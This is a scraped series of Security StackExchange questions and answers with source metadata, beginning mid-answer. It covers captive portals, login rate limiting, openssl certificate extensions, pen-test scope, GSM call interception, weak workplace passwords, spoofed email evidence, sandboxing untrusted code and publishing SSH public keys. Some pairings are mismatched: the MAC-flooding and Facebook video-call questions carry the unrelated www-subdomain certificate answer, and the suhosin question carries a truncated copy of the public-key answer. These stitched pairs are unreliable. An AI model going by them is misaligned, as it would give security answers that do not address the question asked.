intrusion to a non- root account, it is extremely important to prevent upgrade to root access . If the root password is weak then you may very well have an open vulnerability there via brute force. Also, supposing there is some other account that has sudo permission, these need strong passwords also. Do not dismiss the importance of preventing malicious applications from being able to gain root access; and beware of the risk of changes in your configuration. Also there is a strong possibility that you and I do not know the same attack vectors that your adversary does . You may be able to increase the length of the password to compensate for decreased complexity, thereby making it easier to type. As a touch typist, I have a hard time relating to your problem though. | {
"source": [
"https://security.stackexchange.com/questions/149768",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24880/"
]
} |
149,852 | I have been looking into how https and ssl protect the user from captive portals. If a client tries to access https://www.google.com and the hotspot does not provide a valid certificate it prevents the user from connecting. How then do hotspots like xfinitywifi redirect all requests, https or not, to their login page? They have a certificate for wifi.xfinity.com but not for google so shouldn't the browser not connect? EDIT: The answers below are very informative and I have learned a lot but I still do not understand this aspect: in my case with Xfinity hotspots the user does not have to ignore a warning because there is none. It seamlessly transfers https sites to its own login site without warnings. I know that the test site that I go to is https. Why is this? | Most hotspots redirect with invalid certificates. Browser/OS use heuristics to detect that behavior. This determination of being in a captive portal or being online is done by attempting to retrieve the webpage http://clients3.google.com/generate_204 https://www.chromium.org/chromium-os/chromiumos-design-docs/network-portal-detection MacOS and iOS use http://captive.apple.com/hotspot-detect.html (thanks @ceejayoz ) For example, android will display a notification to redirect the use to the portal login page. | {
"source": [
"https://security.stackexchange.com/questions/149852",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83684/"
]
} |
149,994 | Everyone is aware of the convention/need for strong passwords. With the number of different kinds of clues people can use in their passwords, plus the various permutations of caps and digit-letter substitution, a hacker would need to make many attempts on average, in order to get the successful password. This link: Slowing down repeated password attacks discusses some effort to discourage all that guessing, although it's not the same question I have: Why hasn't it become the norm to interfere with repeated guesses? An increasing backoff time after each wrong guess is one way, and others have been discussed. I have seen very few attempts to inhibit such guessing on Linux systems, or any web-based authentication. I have been locked out of one system when I got it wrong 3 times. IT folks impose more and more constraints, like character count, letters, digits, caps, and exclusion of user name from password. But that simply increases the number of needed attempts in a situation where the number is not really restricted. | I'd like to challenge your assumption that this isn't being done. [warning: wild approximations to follow] Remember that a successful brute-force attack will require millions or billions of guesses per second to do the crack in a reasonable amount of time (say, a couple hours to a month depending on the strength of your password). Even a rate-limit of 100 password attempts per second would increase the crack time from a month to hundreds of thousands of years. Maybe my standards are low, but that's good enough for me, and no human user legitimately trying to get into their account will ever notice it. Even better if the rate-limit was by IP rather than by username just to prevent some kinds of Denial-Of-Service attacks. Also, I don't know which Linux distribution you're using, but on my Ubuntu and CentOS systems, when I mistype my password at either the GUI or terminal login screens, it locks for 1 second before re-prompting me. Even if the server isn't actively rate-limiting login attempts (which they really should be), just the ping time by itself is enough to slow you down to millions of years. You'll probably DDOS the server before getting anywhere close to 1 billion guesses / second. The real money is in getting a copy of the hashed passwords database and feeding that into a GPU rig where billions of guesses per second are possible. TL;DR: if you are going to put effort into hardening your login server, you'll get more bang for your buck by improving your password hashing, and making your database hard to steal than by implementing rate-limiting on your login screen. UPDATE : Since this went viral, I'll pull in something from the comments: This logic only applies to login servers. For physical devices like phones or laptops, a "3 attempts and it locks" or a "10 attempts and the device wipes" type thing still makes sense because someone could shoulder-surf while you're typing your password, or see the smudge pattern on your screen, or know that a 4-digit PIN only has 10,000 combinations anyway, so the number of guesses they need to do is very very much smaller. | {
"source": [
"https://security.stackexchange.com/questions/149994",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/89130/"
]
} |
150,078 | My goal is to create a certificate with openssl similar to this one generated with cfssl Certificate:
Data:
Version: 3 (0x2)
Serial Number:
60:44:dc:0d:80:f4:54:55:e8:0d:95:61:f8:8f:b7:7e:f7:8d:29:69
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, ST=California, L=San Francisco, O=Honest Achmed's Used Certificates, OU=Hastily-Generated Values Divison, CN=Autogenerated CA
Validity
Not Before: Jan 30 14:18:00 2017 GMT
Not After : Jan 30 14:18:00 2018 GMT
Subject: L=the internet, O=autogenerated, OU=etcd cluster, CN=etcd
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (384 bit)
pub:
04:53:03:35:3e:cc:4f:19:19:46:0c:f2:81:a0:15:
c9:9e:e1:ab:7f:19:66:14:c8:7a:27:2b:68:ca:c9:
4d:cb:a9:c9:24:eb:cc:83:d8:9c:45:9d:aa:5c:3f:
f5:7b:7c:56:da:3e:4f:ec:5e:a6:68:15:23:51:97:
2c:c8:68:75:57:bb:26:e8:5e:d0:ca:c5:00:cb:f3:
b1:24:af:05:b6:c4:58:18:44:c4:a7:40:1a:35:d6:
d2:6a:9d:3d:bd:66:e5
ASN1 OID: secp384r1
NIST CURVE: P-384
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
86:DF:8E:43:75:4A:75:B0:BF:D5:DC:17:75:A4:FC:8C:23:76:CF:75
X509v3 Authority Key Identifier:
keyid:3B:65:F0:74:60:17:FC:0D:4E:CF:7A:63:5F:DB:6F:B3:CC:95:39:71
X509v3 Subject Alternative Name:
DNS:localhost, IP Address:192.168.73.120, IP Address:192.168.73.121
Signature Algorithm: ecdsa-with-SHA384
30:64:02:30:01:6f:4a:4e:71:06:e8:79:b6:46:72:ae:13:21:
fd:0b:91:ab:a9:18:a2:2a:ec:89:f3:c9:18:e3:31:7e:a7:d3:
51:8d:b8:e2:8c:64:32:33:63:d7:54:7c:1d:67:08:e5:02:30:
05:92:43:9d:51:a6:92:d6:42:82:2f:86:9c:0e:31:be:47:51:
d8:6d:68:c6:83:a1:24:9b:25:e4:15:af:fc:65:96:28:8f:de:
4d:b4:84:73:8a:cd:44:af:df:96:91:cd In order to do so, I'm running the following commands: openssl genrsa -out etcd1-key.pem 2048
openssl req -new -key etcd1-key.pem -config openssl.conf -subj '/CN=etcd' -out etcd1.csr
openssl x509 -req -in etcd1.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out etcd1.pem -days 1024 -sha256 The content of openssl.conf is: [req]
req_extensions = v3_req
distinguished_name = dn
[dn]
[v3_req]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
subjectAltName = IP:127.0.0.1, IP:192.168.73.120, IP:192.168.73.121 This is the csr file: Certificate Request:
Data:
Version: 0 (0x0)
Subject: CN=etcd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a7:cd:eb:4c:9b:d0:30:f6:65:21:da:26:1c:e0:
82:cd:d4:79:d6:51:95:ec:9a:cb:0f:f9:99:14:cd:
dc:ba:ee:0d:5c:2e:ed:05:88:6b:c6:36:16:34:64:
5d:89:27:05:89:d2:38:99:24:47:a1:95:eb:7c:c8:
3f:d0:c1:cf:f2:41:0c:09:2d:03:e9:fc:ac:37:30:
f6:53:c7:e1:6e:12:bb:dc:8d:c5:4a:ba:77:ba:4b:
c5:b5:7f:0f:68:a3:e2:e8:c8:24:1a:f4:46:6f:41:
ba:03:02:42:6d:44:dd:95:47:b4:9f:c7:b6:de:c5:
91:b7:27:62:85:ba:17:2b:df:25:b6:0c:09:05:04:
a5:36:22:55:8a:9f:5b:fc:dd:53:d0:19:00:c8:90:
74:b8:18:66:f2:c9:44:2c:45:0f:01:3e:f4:fe:3b:
6e:09:d7:3f:ea:f3:e9:ab:b8:32:c2:f7:e2:af:2a:
d5:a7:79:2a:ec:75:8a:24:be:b5:a8:21:37:f0:b8:
cf:63:6f:0f:82:14:10:8c:21:c6:56:31:3a:e7:28:
18:76:4e:ac:19:fa:e7:02:e2:56:ab:03:a1:8e:2f:
5d:c9:e4:e7:b6:e4:12:d3:41:b4:b0:a0:94:b9:24:
d6:4d:14:20:43:d2:04:94:58:23:7f:76:d5:28:65:
b5:9f
Exponent: 65537 (0x10001)
Attributes:
Requested Extensions:
X509v3 Basic Constraints:
CA:FALSE
X509v3 Key Usage:
Digital Signature, Key Encipherment
X509v3 Subject Alternative Name:
IP Address:127.0.0.1, IP Address:192.168.73.120, IP Address:192.168.73.121
Signature Algorithm: sha256WithRSAEncryption
29:87:46:77:85:2e:22:a8:1d:5c:c4:f9:b4:f7:ae:e7:99:d9:
a3:24:31:51:1f:57:f5:a4:40:1d:a6:16:4e:af:eb:60:f5:ac:
10:92:9b:25:be:e6:79:e7:99:04:2d:80:a1:3d:42:62:77:16:
40:52:38:27:3b:fe:b5:d6:41:59:68:0c:38:47:57:00:d6:2f:
83:16:99:8a:70:5d:a8:0a:e8:b7:1b:c6:b9:69:70:6c:ee:84:
04:8e:6a:3a:27:5e:ce:97:88:4c:88:93:69:11:17:59:95:e8:
9a:da:b3:9b:37:d5:38:81:2e:b8:41:f8:32:7f:0b:50:d3:30:
c5:51:c4:5c:aa:f8:ff:c6:08:44:e5:58:26:f7:ad:ba:e2:76:
f1:c1:c5:08:e6:b5:29:cb:f5:ce:f8:0b:45:a2:1d:f0:ee:d2:
1b:be:75:a6:4a:16:f0:9f:ec:b2:1a:49:31:a5:de:5e:ea:54:
27:0c:47:a2:8b:6f:aa:05:d9:b8:3c:20:81:28:bd:b8:0a:76:
39:f6:2b:4a:7f:e7:93:44:03:30:ce:b4:3e:b8:b2:55:9b:c4:
06:65:61:16:26:02:d0:d3:01:cb:89:fc:6f:3f:7d:0c:e8:12:
a6:31:04:4e:bc:56:3f:42:31:49:1d:d5:c5:e0:09:25:97:3f:
67:3a:5c:d3 And finally, this is the content of the certificate ( etcd1.pem ) that is generated: Certificate:
Data:
Version: 1 (0x0)
Serial Number: 10309206242166002114 (0x8f11a874ec8b51c2)
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=etcdCA
Validity
Not Before: Feb 1 14:12:24 2017 GMT
Not After : Nov 22 14:12:24 2019 GMT
Subject: CN=etcd
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:db:79:86:ad:b3:96:64:b3:52:49:56:bd:d6:4f:
5c:ef:8c:90:86:4f:2f:f9:9a:42:f4:38:55:79:c6:
70:bb:86:37:45:52:1c:f1:97:67:83:c4:12:04:c4:
84:44:e9:28:c9:b2:ef:d1:24:a2:e6:1e:7b:c7:4c:
6e:36:aa:fb:3b:43:c0:2b:28:1f:68:79:36:f0:47:
10:ec:91:c0:f9:82:80:32:c3:c5:8b:5f:f9:38:9e:
23:67:de:17:fc:a7:cc:03:26:41:fd:67:74:5d:e7:
7e:d0:31:fb:a2:ad:1c:86:6a:da:6f:11:11:59:63:
d9:31:a6:14:30:6e:0b:0a:bb:4b:0f:ae:21:3a:f2:
4c:34:b3:43:9c:60:ef:af:52:db:51:ec:bf:81:71:
8f:d2:6c:8d:46:7b:6c:8a:5b:8f:74:53:36:0b:cd:
7a:fb:9c:a4:22:c3:75:10:42:7a:ae:c3:91:cf:16:
ff:5b:a2:34:e9:4b:c0:fe:8d:4d:71:a4:25:65:59:
27:24:7a:52:ec:2f:f9:b6:12:5d:aa:77:df:b1:97:
49:d5:c1:12:8d:0f:3c:39:b2:d7:42:2e:de:e9:1f:
41:3c:a6:69:27:ff:ed:30:55:6a:ce:08:fc:28:98:
79:d0:dc:0c:4f:0b:b6:c8:5d:80:bb:47:6c:60:6f:
81:cd
Exponent: 65537 (0x10001)
Signature Algorithm: sha256WithRSAEncryption
51:06:03:cb:21:3b:34:e1:2c:9e:16:cc:f1:64:9d:bb:13:11:
24:fd:2e:67:22:83:9e:91:09:9b:4b:b8:f2:c1:03:5c:45:bf:
79:0d:c3:04:81:a7:ce:b9:89:64:ab:ae:7f:86:24:79:cf:e4:
ea:63:73:e3:a3:e0:ef:70:47:f6:19:84:f9:78:e4:27:75:f5:
69:2e:ca:14:47:bd:73:9f:c9:0d:25:73:09:a1:cd:11:67:0a:
eb:3b:b2:b0:b3:97:16:37:23:08:ea:a8:5a:fd:25:52:17:8b:
1e:99:b0:d6:8d:fc:ba:dc:85:29:1c:2a:8c:ea:5a:65:81:fc:
12:50:b1:25:a1:9f:56:8b:8a:d5:15:cc:17:bb:4c:60:4e:da:
d3:a2:08:a8:7d:95:19:67:dc:6f:4b:4f:6f:49:f0:81:66:b9:
65:45:75:dc:c7:35:28:ce:f4:55:c4:82:db:fa:b1:48:6d:05:
b2:ac:65:ee:cd:b5:b2:52:b7:dc:3c:9c:67:a5:08:28:2e:57:
57:65:46:16:54:6b:6d:be:73:d2:2f:bd:f5:12:b8:84:43:2a:
f1:15:bd:1a:c1:37:76:20:9f:00:0d:a4:28:e4:c7:ad:0a:d9:
1d:08:e3:d4:77:d7:e1:63:d8:02:57:ed:49:71:7f:c7:be:ae:
39:06:5c:09 As you can see, it's missing the X509v3 extensions section, and I don't know why, because it's there in the csr . So, what's missing in the last command to include the extensions?? | According to the bugs section of the x509 command documentation , Extensions in certificates are not transferred to certificate requests and vice versa. To work around this, I manually added the extensions to the self-signed certificate. This I did by copying the options from the [v3_req] section into a [v3_ca] section in a new file, and supplying that as an extensions file to the x509 command: -extensions v3_ca -extfile ./ssl-extensions-x509.cnf # ssl-extensions-x509.cnf
[v3_ca]
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
subjectAltName = IP:127.0.0.1, IP:192.168.73.120, IP:192.168.73.121 | {
"source": [
"https://security.stackexchange.com/questions/150078",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/15194/"
]
} |
150,096 | Specifically considering client websites where we have been asked to execute a pen test; at what point do we stop and say we're done? We have access to various tools (some automated, some manual); but if we say "we tried all our tools, and couldn't make any progress", that could be construed as us saying that we're not clever enough (and there's always some hacker out there who could be cleverer). So; how do we protect ourselves against upset clients who claim that we didn't work with due diligence? Is there a standard report framework we can work within? | So this is actually a very interesting question for the industry in general. The way I would suggest you handle it is Have something in your contract that disclaims liability for vulnerabilities not noted during testing. Reason for this is, it's basically impossible to be sure that you've found every exploitable issue in a website, or any other system. To pick one example, think of all the sites that were sitting vulnerable to shellshock for years and years, should all the pen test companies who touched one of those sites be liable for not telling their customers? Have a methodology, saying what you will do. This should cover the general areas of testing that will be completed. For websites, consider basing on something like the OWASP Top 10 as a starting point. This gives you some common ground with the customer on what you'll be looking at. Make sure your company covers the basics with a checklist. as @rapli says above document all the little things, but don't overblow the severity. Whilst it's important to make sure your test isn't just a checklist, using one can avoid embarassing mistakes where basic tests get missed. The problem you might/will run into is unrealistic expectations from customers. that one is a case by case to address. If you get a customer that expects that their complex application will be completely reviewed in like 5 person-days of testing, well you should explain why that's not a practical concept :) | {
"source": [
"https://security.stackexchange.com/questions/150096",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66867/"
]
} |
150,153 | By dumbphone I mean: no internet connection, very limited features, etc. By more secure I mean: secure from malicious and direct hacking. I don't mean as in protected from government tapping/snooping; I don't mean from authorities who could be granted access somehow, through the mobile operator company. Has the security of the basic phone call changed much, in the last 10 years ? Obviously smartphones have an endless number of new security holes as time goes on, a quick browse of Apple's security updates history, or searching Android in the tech news, proves this. But I'd suspect most of these vulnerabilities can be utilised because of the frequent connections to the internet made with them.
So, do smartphones utilise anything new [purely in] the initiation and connection of just the phone call itself ? | Has the security of the basic phone call changed much, in the last 10 years ? So, do smartphones utilise anything new [purely in] the initiation and connection of just the phone call itself ? Yes. There are new technologies used to establish phone calls in cellular networks. Those new technologies mitigate some attacks which were possible due to flaws in the older ones. So if you use a "dumbphone" that runs on the older technologies you are subject to those attacks (i.e. the inverse is true, the smartphone is in this respect more secure). The technologies used in the cellular networks basically evolved over time like this: 1st generation (analogue), 2nd generation (GSM etc.), 3rd generation (UMTS etc.), 4th generation (LTE etc.). If you use a device running for example the GSM technology, an attacker might intercept your calls with hardware costs of only about $30 USD . Intercepting calls made with the newer technologies is harder up to a point where only nation state attackers can perform them. | {
"source": [
"https://security.stackexchange.com/questions/150153",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/112311/"
]
} |
150,184 | I'm on a temporary job so they don't give me any passwords to access the sites and resources I need. Instead, they tell me to move to another computer where a regular employee is and where every password is already set and saved on the browser. I have to be honest, I got into the router (as they are using default credentials) to get the WiFi password so I can use it on my phone and found that it had a lot to do with the activity the company does ( e.g. if they were a restaurant, their password would be coffe123 ). With that in mind, I just wanted to see if the same pattern was used for other types of resources such as the email address, hosting accounts, etc. and yes, they were. When registering another domain with a new account, I guessed the password by seeing my boss slowly typing on the keyboard and, again, weak as f*. Should I tell them? I'm afraid I might get in trouble for lurking too much. Just as a clarification: it's not a big company, we are just a few employees and none of them but me know about computers and security, so there's no way of anonimously reporting the issue or contacting a sysadmin or IT related guy. | While there is no doubt that weak passwords are an issue for your company, I would strongly advise against telling your boss about the things that you have done. Your company decided against giving temporary workers access to sites and resources for a reason. Not only did you gain unauthorized access to the wireless LAN by guessing the password to the router, you also extended that access by probing the credentials against other resources - Resources that you were not supposed to have the password to. You then basically shoulder surfed your boss. While there seem to be flaws in your employers policy concerning the access to company resources, and their password policies, all of these things could be considered 'hacking' by your employer and were definitely outside of your authorization. If I were you I would log off the WLAN and ask your employer for the password if you want to have access to it. Apart from that you should stop trying to use other peoples passwords on any access points just 'to see if the same pattern was used'. Depending on the legal system of the involved countries you can very well face legal problems for these kinds of acts. So what should you do with the information you have? If your employer gives you a password to a service or a resource you could point out, that e.g. that password would easily be guessable for other people. I would not mention the other password here directly though. If your boss seems interested you could volunteer to research password best practices for the company. If they are serious about it, this would eliminate your concerns. If there is an IT person in the company you could bring these concerns to him as he will probably understand the need for a secure password policy better. | {
"source": [
"https://security.stackexchange.com/questions/150184",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/108682/"
]
} |
150,331 | When I'm opening https://india.gov.in , it's opening all right. But for https://www.india.gov.in , the browser is throwing a certificate error. Why is that happening? | www is a common prefix for websites. However, at a technical level it is just another subdomain, and there's nothing special about it. If a webserver accepts both or even more DNS names, it has to be configured that way. The server decides which configuration to use based on the DNS name in the HTTP request. The certificate served for https://india.gov.in covers india.gov.in . It does not cover www.india.gov.in , nor does it cover any other subdomain ( foo.india.gov.in ) or other domain ( example.com ). This is the most basic form of TLS certificate, and a pretty common one. The DNS records for india.gov.in and www.india.gov.in don't necessarily have to go to the same place; they could resolve different IP addresses and dfferenet DNS record types. This is commonly done for hosting various applications on a single base domain, e.g. having mail.india.gov.in go to a webmail server. A common way for companies to deal with this sort of issue is to buy a wildcard certificate ( *.india.gov.in ) to cover all their subdomains. OWASP recommends against this because you have to secure every endpoint that needs the certificate (in our example above, an attacker breaching the webmail could extract the certificate and use it to man-in-the-middle a connection to the normal website, or vice versa). A better option is to use a SAN certificate that includes just india.gov.in and www.india.gov.in , then set up redirects for any page requested on one domain to the other. | {
"source": [
"https://security.stackexchange.com/questions/150331",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/42745/"
]
} |
150,337 | What could happen if someone continuously sends frames with different source MAC addresses to the same port on a switch? Knowing that this port doesn't apply the "port-security" mode. | www is a common prefix for websites. However, at a technical level it is just another subdomain, and there's nothing special about it. If a webserver accepts both or even more DNS names, it has to be configured that way. The server decides which configuration to use based on the DNS name in the HTTP request. The certificate served for https://india.gov.in covers india.gov.in . It does not cover www.india.gov.in , nor does it cover any other subdomain ( foo.india.gov.in ) or other domain ( example.com ). This is the most basic form of TLS certificate, and a pretty common one. The DNS records for india.gov.in and www.india.gov.in don't necessarily have to go to the same place; they could resolve different IP addresses and dfferenet DNS record types. This is commonly done for hosting various applications on a single base domain, e.g. having mail.india.gov.in go to a webmail server. A common way for companies to deal with this sort of issue is to buy a wildcard certificate ( *.india.gov.in ) to cover all their subdomains. OWASP recommends against this because you have to secure every endpoint that needs the certificate (in our example above, an attacker breaching the webmail could extract the certificate and use it to man-in-the-middle a connection to the normal website, or vice versa). A better option is to use a SAN certificate that includes just india.gov.in and www.india.gov.in , then set up redirects for any page requested on one domain to the other. | {
"source": [
"https://security.stackexchange.com/questions/150337",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138306/"
]
} |
150,342 | Are video calls placed through FB messenger really private or safe? What is the probability that it could be sniffed or intercepted by hackers? Is Facebook recording the data or just meta data of the video calls? If so, for how long? | www is a common prefix for websites. However, at a technical level it is just another subdomain, and there's nothing special about it. If a webserver accepts both or even more DNS names, it has to be configured that way. The server decides which configuration to use based on the DNS name in the HTTP request. The certificate served for https://india.gov.in covers india.gov.in . It does not cover www.india.gov.in , nor does it cover any other subdomain ( foo.india.gov.in ) or other domain ( example.com ). This is the most basic form of TLS certificate, and a pretty common one. The DNS records for india.gov.in and www.india.gov.in don't necessarily have to go to the same place; they could resolve different IP addresses and dfferenet DNS record types. This is commonly done for hosting various applications on a single base domain, e.g. having mail.india.gov.in go to a webmail server. A common way for companies to deal with this sort of issue is to buy a wildcard certificate ( *.india.gov.in ) to cover all their subdomains. OWASP recommends against this because you have to secure every endpoint that needs the certificate (in our example above, an attacker breaching the webmail could extract the certificate and use it to man-in-the-middle a connection to the normal website, or vice versa). A better option is to use a SAN certificate that includes just india.gov.in and www.india.gov.in , then set up redirects for any page requested on one domain to the other. | {
"source": [
"https://security.stackexchange.com/questions/150342",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138206/"
]
} |
150,486 | I want to make a little programming puzzle on my website. There's going to be a task. The user will be asked to upload a C++ source file with their solution. The file should be compiled, run with some input and checked if it produces right output. What are the security risks? How do I make sure that the uploaded file won't be able to do anything malicious? Alternatively, there are sites like Tutorials Point that let you compile and run C++ code. How do they manage the security? | It is impossible to analyze a program to find out if it will do anything malicious. That is true regardless of whether you are attempting to analyze the source or compiled code. The way to do what you are asking for is done by compiling and running the code in a sandbox. Once the program has terminated (or after a timeout you have decided upon) you destroy the sandbox. The security of such a construction is as secure as the sandbox you are using. Depending on the requirements of the code you need to run the sandbox could be either something simple like Linux secure computing mode, or something complicated like a full blown virtual machine - ideally without network connectivity. The more complicated the sandbox you need the larger risk of a security vulnerability in the sandbox undermining an otherwise good design. Some languages can safely be compiled outside a sandbox. But there are languages where even compiling them can consume unpredictable amount of resources. This question on a sister site shows some examples of how a small source code can blow up to a large output. If the compiler itself is free from vulnerabilities it may be sufficient to set limits on the amount of CPU, memory, and disk space it is allowed to consume. For better security you can run the compiler inside a virtual machine. Obviously these methods can be combined for an additional layer of security. If I were to construct such a system I would probably start a virtual machine and inside the virtual machine use ulimit to limit the resource usage of the compiler. Then I would link the compiled code in a wrapper to run it in secure computing mode. Finally still inside the virtual machine I would run the linked executable. | {
"source": [
"https://security.stackexchange.com/questions/150486",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138475/"
]
} |
150,527 | I just got a letter from court saying I made 49 threats to someone I had a problem with three years ago. This person presents "my emails" as evidence. I went through all my emails, and I haven't found a single one. The mail presented as evidence all come from my email address. He asks for 20,000 dollars for moral damage!
How can this happen? (ed. The letter is a valid and official legal document in accordance with the normal procedures in the country of Portugal. OP has already engaged with a lawyer. The accuser is a known scam artist. This question is about the technical details of the emails.) | Is it a scam? First of all, make sure that you actually got the letter from a court. This might very well be a scam - it sure sounds like one. Do this to verify that the letter is real: Make sure that the name of the court correspond to a real court. Find contact information to that court through some independent method (i.e. not using any information in the letter). Contact them and ask them if they did in fact send the letter. If it is not a scam If it is not a scam, I see three possibilities: The person accusing you of the threats never received the emails, and have forged the evidence. That would not be hard to do. (An investigation of the email headers will not help here, since they can also be forged.) Someone has spoofed your email address, and has sent emails that appear to come from you. This is by no means impossible . (An investigation of the email headers could be useful here.) Someone has hacked your email account (perhaps you used the same password on a site that was breached ), sent the emails, and then deleted all traces (e.g. removed them from the sent items folder). (An investigation of the email headers would not help here, since the email is in fact sent from your address. Access logs from your email provider could prove useful, though.) If it's not a scam, what you need to do in any case is to get some legal advice. | {
"source": [
"https://security.stackexchange.com/questions/150527",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/138528/"
]
} |
150,540 | I use a RSA key to log into remote servers with ssh. And I keep my dot files under version control in a publicly accessible place so that I can quickly setup new servers to work the way I like. Right now I don't have my .ssh directory under version control. But it would save a step if I could keep .ssh/authorized_keys in the dotfile repository. It's just a public key. My private key sits only on trusted client machines in my possession, of course. I made it a 4096-bit RSA key because that seems like the best balance between wide compatibility with common sshd versions and security. So my question is, is there any security problem with literally publicly publishing the public key? Nobody is regularly nosing around my dotfiles repository, but it's not a secret and anybody interested could read them. | Public Keys are designed for sharing, read access to and or publishing a public key is fine Private Keys are secret, they should only be accessible to the owner of said private key. To drive this point home, think back to every HTTPS website you have ever visited. In each case, as part of HTTPS the site gives you their public key. So not only is it safe to publish it, it is intended to be this way. For example, if you click on the green lock icon on your address bar, you can find the public key for this website (if you are viewing it on HTTPS) *.stackexchange.com
Modulus (2048 bits):
BD 15 6A 1B 0A 03 69 CC 00 99 A0 4E 9E 31 99 34
3F 32 B8 6B 7C 62 0A 4D DC 45 41 72 8A 3E 92 DA
B3 64 45 B2 31 59 DE 71 60 D3 E3 26 91 DE 55 0D
3C F1 8C E2 C3 4C 01 F1 39 B4 A1 45 D5 9A 77 05
FC 2D 92 C6 B9 CE 10 4D DB 6F 7B 72 44 C0 18 38
4E B3 5E 3B 59 74 5C 52 E1 E7 3F E9 1C B8 23 F5
94 99 BE E7 BC 19 AA DE C0 6A C4 5E 4C 83 2D 5E
3B 1F 7F 97 56 42 28 C9 9E E4 D7 E8 45 E2 E1 D5
D5 E3 FD 73 01 D5 59 49 7C 97 82 F4 F3 AC 09 5B
4D 88 A1 F0 A3 7F 9A D6 2E E1 32 78 5C 0E F8 7D
74 E5 1C E8 C5 62 5A 78 AF 3C C4 51 75 FA F8 41
C4 5F 60 47 CE 81 80 83 57 6A 6C 31 29 EA C8 8A
CB C8 8C 3F 50 51 F0 06 F2 D2 24 18 60 87 7D AB
B0 6F 81 F6 3E B7 F1 F3 6F ED 67 73 41 EA FF 83
61 CA C3 2C A6 44 F2 58 21 6C C9 DD EC 95 85 7C
B2 AD E4 35 E2 9B 9F 82 0C 7A AB 58 18 0E 54 97
Public Exponent (24 bits):
01 00 01 Further examples of this can be found on github.com where they request that you attach a public key to your account for use with git clone [email protected]:<user>/<repo> You can actually check the public keys of any user on github with the following URL https://api.github.com/users/<user>/keys mine is listed as: [
{
"id": 18667533,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDraswAp7EbMwyYTzOwnSrsmr3nNMDaDf4e2YVaehLc9w6KN2ommomXZO8/V9N3yINNveGqrcVc9m2NTm04iILJUKd9o25ns8QIG6XSCt9SVx/Xw1J/SXfIWUKuEe0SgmIwVwkk8jetfG/Z7giSiU3dxxC4V9lHQCFgKOKBWGpNbINmqtmBWncX3HJKeXrpSddoePbZZ84IEFr4CWUlqoXyphpxqzpfA9sRpVTtyBPcUSj68j4+gKgEQN65G6LXys3q8BiwWxucci6s34vp4L8jKn7uYh26vLuT1oIbODJphCmpvMH+ABPkNQcFBk4rRLpCEAsoAhmvTk/NjnfZM+nd"
},
{
"id": 21175800,
"key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5tPV481acCZ5wm2E15gXkVRaKCE3lic/O8licyzW+eDE9rPpG4rHRRH9K2ENmstUh5nLEenb0nNhEGnsf3pIJRZ07JXwv16+lsJBSS8+YiWeMBlwo+JNaxwSyUlYUgl1ruogr0nR0KBqsYSWXuG0s2jm2IOV+0B/0fzDR/tiLFLj50+iJ9qCDSk/8fAsXz2xG39KcUcxmCbDXb/qSdESWaZc+pafNRiCcVNfMkKeDViWlzI4VkiTcfVCraHUuYx4jgOBB526dRWSDG9bLchwlJiopgT+k4X/TNe2l01DPwYetwLvY6V8rcPrjjJL8ifRTMSof1zRIoBgJZhRzWc1D"
}
] The exact opposite is true of Private Keys which should be secured at all times and never given to a third party or exchanged via email without encrypting them. If someone has accessed your private key, they have the ability to access any device or encrypted file that was protected with your public key. It also means that they can sign things on your behalf. It is VERY bad if someone has gained access to your private key. In many cases SSH Clients will not function if it is detected that the permissions of the Private key file are such that users other than you have read access. | {
"source": [
"https://security.stackexchange.com/questions/150540",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/88848/"
]
} |
150,549 | I have a server with suhosin installed (a protection system for PHP installations). I noticed software I am running is causing the following logs on suhosin. ALERT - configured GET variable value length limit exceeded - dropped variable
ALERT - configured request variable name length limit exceeded - dropped variable Could allowing long request variable names or values present a security issue? | Public Keys are designed for sharing, read access to and or publishing a public key is fine Private Keys are secret, they should only be accessible to the owner of said private key. To drive this point home, think back to every HTTPS website you have ever visited. In each case, as part of HTTPS the site gives you their public key. So not only is it safe to publish it, it is intended to be this way. For example, if you click on the green lock icon on your address bar, you can find the public key for this website (if you are viewing it on HTTPS) *.stackexchange.com
Modulus (2048 bits):
BD 15 6A 1B 0A 03 69 CC 00 99 A0 4E 9E 31 99 34
3F 32 B8 6B 7C 62 0A 4D DC 45 41 72 8A 3E 92 DA
B3 64 45 B2 31 59 DE 71 60 D3 E3 26 91 DE 55 0D
3C F1 8C E2 C3 4C 01 F1 39 B4 A1 45 D5 9A 77 05
FC 2D 92 C6 B9 CE 10 4D DB 6F 7B 72 44 C0 18 38
4E B3 5E 3B 59 74 5C 52 E1 E7 3F E9 1C B8 23 F5
94 99 BE E7 BC 19 AA DE C0 6A C4 5E 4C 83 2D 5E
3B 1F 7F 97 56 42 28 C9 9E E4 D7 E8 45 E2 E1 D5
D5 E3 FD 73 01 D5 59 49 7C 97 82 F4 F3 AC 09 5B
4D 88 A1 F0 A3 7F 9A D6 2E E1 32 78 5C 0E F8 7D
74 E5 1C E8 C5 62 5A 78 AF 3C C4 51 75 FA F8 41
